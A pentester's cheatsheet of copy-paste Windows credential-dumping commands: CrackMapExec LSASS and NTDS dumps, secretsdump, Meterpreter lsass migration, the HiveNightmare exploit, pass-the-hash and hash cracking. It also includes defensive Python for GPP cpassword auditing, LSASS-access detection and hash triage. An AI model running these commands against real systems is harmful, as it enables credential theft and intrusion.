
Windows — Credentials Dumping
by Karol Mazurek
Cheatsheet with current tools & techniques for Windows credentials dumping.
INTRODUCTION
The article presents the current tools & techniques for Windows credential dumping. It is very short and written in cheatsheet style: the main goal was to aggregate the commands in one place, so you can just copy and paste them during an assessment. As a bonus, at the end you will find the commands for cracking Windows hashes with John the Ripper and Hashcat.
TOOLS
- LaZagne
- Impacket
- CrackMapExec
- HiveNightmare (CVE-2021-36934)
- Meterpreter — credential_collector
- Meterpreter — smart_hashdump
COMMANDS
- Finding passwords for the most commonly-used software:
laZagne.exe all
- Manual search for the text ‘password’ in certain file types (double quotes work in both cmd.exe and PowerShell; single quotes are passed literally by cmd.exe):
findstr /si "password" *.txt *.xml *.docx
- Remote hash dumping without executing any agent on the target:
impacket-secretsdump $domain/$user:$pass@$ip
- Various hash dumping techniques using CME (add the option --local-auth if your user is a local account):
crackmapexec smb $ip -u $user -p $pass --sam
crackmapexec smb $ip -u $user -p $pass --lsa
crackmapexec smb $ip -u $user -p $pass --ntds
crackmapexec smb $ip -u $user -p $pass --ntds vss
crackmapexec smb $ip -u $user -p $pass -M lsassy
crackmapexec smb $ip -u $user -p $pass -M wireless
crackmapexec smb $ip -u $user -p $pass -M handlekatz
crackmapexec smb $ip -u $user -p $pass -M nanodump
crackmapexec smb $ip -u $user -p $pass -M procdump
crackmapexec smb $ip -u $user -p $pass --laps
crackmapexec smb $ip -u $user -p $pass -M gpp_password
If the local administrator account is not named administrator, add the account name after the option:
--laps <name>
- Decrypting GPP:
gpp-decrypt $encrypted_password
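Added example (my own code, not part of the original cheatsheet and not part of gpp-decrypt): a Python scanner that finds the weak setting itself, i.e. preference files in SYSVOL that still carry a cpassword attribute. Microsoft removed the ability to set such passwords with MS14-025, but files created earlier stay readable by every domain user until the preference item is deleted. The Groups.xml below is constructed; the path passed to scan_sysvol() is assumed to be a local copy or mount of the SYSVOL share.

```python
"""Audit Group Policy Preference XML files for stored cpassword attributes.

Added example, not from the original cheatsheet. Any preference file under
SYSVOL (Groups.xml, Services.xml, ScheduledTasks.xml, DataSources.xml,
Drives.xml, Printers.xml) that still carries a cpassword attribute exposes a
reversible password to every domain user who can read SYSVOL.
"""
import os
import xml.etree.ElementTree as ET

# Preference files known to carry cpassword attributes.
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}

# Attribute that names the account in each file type.
ACCOUNT_ATTRS = ("userName", "username", "accountName", "runAs")


def find_cpasswords(xml_text, source="<string>"):
    """Return one finding per element that carries a non-empty cpassword."""
    findings = []
    root = ET.fromstring(xml_text)
    for elem in root.iter():
        cpassword = elem.get("cpassword")
        if not cpassword:
            continue
        account = next((elem.get(a) for a in ACCOUNT_ATTRS if elem.get(a)), "?")
        findings.append({
            "file": source,
            "element": elem.tag,
            "account": account,
            "cpassword_len": len(cpassword),   # value itself is never printed
        })
    return findings


def scan_sysvol(root_dir):
    """Walk a SYSVOL copy or mount (assumed path) and collect all findings."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root_dir):
        for name in filenames:
            if name not in GPP_FILES:
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", encoding="utf-8-sig") as fh:
                    findings.extend(find_cpasswords(fh.read(), path))
            except (OSError, ET.ParseError) as exc:
                print(f"skip {path}: {exc}")
    return findings


# Constructed sample: one user with a stored password, one without.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="helpdesk" image="2">
    <Properties action="U" cpassword="AAAAAAAAAAAAAAAAAAAAAAAAAAAA" userName="helpdesk"
                changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0"/>
  </User>
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="kiosk" image="2">
    <Properties action="U" userName="kiosk" acctDisabled="1"/>
  </User>
</Groups>
"""

if __name__ == "__main__":
    for f in find_cpasswords(SAMPLE_GROUPS_XML, "Groups.xml"):
        print(f"{f['file']}: <{f['element']}> account={f['account']} has a stored cpassword")
```

Every hit means the password should be treated as already disclosed: rotate it and delete the preference item, since the XML stays in SYSVOL for as long as the GPO exists.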
- Meterpreter modules:
(it is a good idea to first migrate into the lsass.exe process)
migrate <id of lsass.exe>
run post/windows/gather/credentials/credential_collector
run post/windows/gather/smart_hashdump
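Added example (my own code, not from the original cheatsheet) covering both the CME LSASS modules above (lsassy, handlekatz, nanodump, procdump) and the Meterpreter migrate step: a minimal detector over Sysmon Event ID 10 (ProcessAccess) and Event ID 8 (CreateRemoteThread). A MiniDump of lsass.exe needs a handle with memory-read rights, and migrating into lsass.exe starts a thread in it; both leave one of these two events. The records are constructed, pipe-delimited key=value lines standing in for the event fields of the same names, and the allowlist of source images is an assumption to be replaced with your own baseline.

```python
"""Flag handle opens and remote threads that target lsass.exe in Sysmon telemetry.

Added example, not part of the original cheatsheet. Covers Sysmon Event ID 10
(ProcessAccess) and Event ID 8 (CreateRemoteThread). Records are constructed
'Key=Value|Key=Value' lines using the Sysmon field names.
"""
# Process access-right bits (Win32 PROCESS_* constants).
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_READ = 0x0010
PROCESS_VM_WRITE = 0x0020
PROCESS_DUP_HANDLE = 0x0040

DUMP_RIGHTS = PROCESS_VM_READ | PROCESS_DUP_HANDLE
INJECT_RIGHTS = PROCESS_CREATE_THREAD | PROCESS_VM_WRITE | PROCESS_VM_OPERATION

# Assumed allowlist: images that open lsass.exe legitimately on this fleet.
# Build it from a baseline of your own hosts; this is a sample, not a standard.
ALLOWED_SOURCES = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\program files\windows defender\msmpeng.exe",
}


def parse_record(line):
    """Parse 'Key=Value|Key=Value' into a dict."""
    rec = {}
    for field in line.split("|"):
        key, sep, value = field.partition("=")
        if sep:
            rec[key.strip()] = value.strip()
    return rec


def classify(rec):
    """Return an alert message for an lsass.exe-targeting record, or None."""
    target = rec.get("TargetImage", "").lower()
    if not target.endswith("\\lsass.exe"):
        return None
    source = rec.get("SourceImage", "").lower()
    event_id = rec.get("EventID")
    if event_id == "8":
        # Any remote thread in LSASS deserves a look; no allowlist here.
        return f"remote thread in lsass.exe from {source}"
    if event_id != "10" or source in ALLOWED_SOURCES:
        return None
    access = int(rec.get("GrantedAccess", "0"), 16)
    if access & DUMP_RIGHTS:
        return f"memory-read handle to lsass.exe (0x{access:X}) from {source}"
    if access & INJECT_RIGHTS:
        return f"injection-capable handle to lsass.exe (0x{access:X}) from {source}"
    return None   # query-only rights such as 0x1400 are routine noise


def scan(lines):
    """Return every alert raised over a list of record lines."""
    return [a for a in (classify(parse_record(line)) for line in lines) if a]


# Constructed sample telemetry: one allowlisted scanner, two dump tools,
# one query-only open, one remote thread, one unrelated target.
SAMPLE_LOG = [
    r"EventID=10|SourceImage=C:\Program Files\Windows Defender\MsMpEng.exe|TargetImage=C:\Windows\system32\lsass.exe|GrantedAccess=0x1FFFFF",
    r"EventID=10|SourceImage=C:\Users\bob\Desktop\procdump64.exe|TargetImage=C:\Windows\system32\lsass.exe|GrantedAccess=0x1FFFFF",
    r"EventID=10|SourceImage=C:\Windows\Temp\nd.exe|TargetImage=C:\Windows\system32\lsass.exe|GrantedAccess=0x1010",
    r"EventID=10|SourceImage=C:\Windows\system32\Taskmgr.exe|TargetImage=C:\Windows\system32\lsass.exe|GrantedAccess=0x1400",
    r"EventID=8|SourceImage=C:\Users\bob\AppData\Local\Temp\stage.exe|TargetImage=C:\Windows\system32\lsass.exe",
    r"EventID=10|SourceImage=C:\Windows\Temp\nd.exe|TargetImage=C:\Windows\system32\notepad.exe|GrantedAccess=0x1FFFFF",
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print("ALERT:", alert)
```

The access-mask check is what matters: tools differ in the exact mask they request, so matching on the PROCESS_VM_READ bit catches all of them, while matching on a single literal such as 0x1FFFFF does not. Preventive controls that make these events much rarer are LSA protection (RunAsPPL) and Credential Guard.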
CVE-2021-36934 aka SeriousSam
An exploit that lets a non-admin user read any of the registry hives.
- Get SAM, SECURITY and SYSTEM hive dumps:
.\HiveNightmare.exe
- Download those 3 files to your machine and dump the hashes:
impacket-secretsdump -sam SAM -system SYSTEM -security SECURITY local
- Log in to the remote system using the PtH (pass-the-hash) technique:
impacket-psexec -hashes $hash $user@$ip
CRACKING
- LM
john --format=lm hash.txt
hashcat -m 3000 -a 3 hash.txt
- NTLM
john --format=nt hash.txt
hashcat -m 1000 -a 3 hash.txt
- NTLMv1
john --format=netntlm hash.txt
hashcat -m 5500 -a 3 hash.txt
- NTLMv2
john --format=netntlmv2 hash.txt
hashcat -m 5600 -a 0 hash.txt
- Kerberos 5 TGS
john --format=krb5tgs hash.txt --wordlist=rockyou.txt
hashcat -m 13100 -a 0 hash.txt rockyou.txt
- Kerberos ASREP
john --format=krb5asrep hash.txt --wordlist=rockyou.txt
hashcat -m 18200 -a 0 hash.txt rockyou.txt
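Added example (my own code, not from the original cheatsheet): before any of the cracking commands above are run, a secretsdump-style file can be triaged for the findings that matter regardless of whether a password is ever recovered. The script parses lines in the user:rid:lmhash:nthash::: form written by impacket-secretsdump and reports which accounts still store an LM hash (the weakest format in the list above, and disabled by the NoLMHash policy on current Windows), which have an empty password, and which share a password (identical NT hashes). The sample dump is constructed and its hash values are placeholders.

```python
"""Triage a secretsdump / pwdump-style hash file.

Added example, not part of the original cheatsheet. Input lines have the form
written by impacket-secretsdump:  user:rid:lmhash:nthash:::
"""
from collections import defaultdict

# Hash of the empty string in each format. A stored LM value equal to EMPTY_LM
# means no LM hash is kept for that account.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"


def parse_pwdump(text):
    """Return (user, rid, lm, nt) tuples, skipping status and malformed lines."""
    records = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("["):     # secretsdump "[*] ..." status lines
            continue
        parts = line.split(":")
        if len(parts) < 4:
            continue
        user, rid, lm, nt = parts[0], parts[1], parts[2].lower(), parts[3].lower()
        if len(lm) != 32 or len(nt) != 32:
            continue
        records.append((user, rid, lm, nt))
    return records


def triage(text):
    """Summarise the weak spots in a dump without cracking anything."""
    records = parse_pwdump(text)
    users_by_nt = defaultdict(list)
    for user, _rid, _lm, nt in records:
        users_by_nt[nt].append(user)
    return {
        "total": len(records),
        "lm_stored": [u for u, _r, lm, _n in records if lm != EMPTY_LM],
        "empty_password": [u for u, _r, _l, nt in records if nt == EMPTY_NT],
        "shared_password": {nt: users for nt, users in users_by_nt.items()
                            if len(users) > 1 and nt != EMPTY_NT},
    }


# Constructed sample; the hash values are placeholders, not real hashes.
SAMPLE_DUMP = """\
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1001:00001111222233334444555566667777:89abcdef0123456789abcdef01234567:::
helpdesk:1002:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
[*] Cleaning up...
"""

if __name__ == "__main__":
    result = triage(SAMPLE_DUMP)
    print(f"{result['total']} accounts parsed")
    print("LM hash stored:", result["lm_stored"])
    print("empty password:", result["empty_password"])
    for users in result["shared_password"].values():
        print("same password:", ", ".join(users))
```

Password reuse between a privileged account and an ordinary one is usually the most important finding in such a file, and it is visible from the NT hashes alone; the same check works on an NTDS dump, where shared hashes across many accounts typically point at a provisioning default that was never changed.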
FINAL WORDS
During the creation of the list with the above-mentioned commands, I tried not to use several tools for the same task — that is why the legendary Mimikatz is not there. If you have any ideas on how to improve the above list with commands that dump passwords using techniques not mentioned above, feel free to comment.
I hope you will find the above tools & commands useful for your assessment!
About the Author
Karol Mazurek - penetration tester.
The article was originally published at: https://karol-mazurek95.medium.com/windows-credentials-dumping-5898d896d048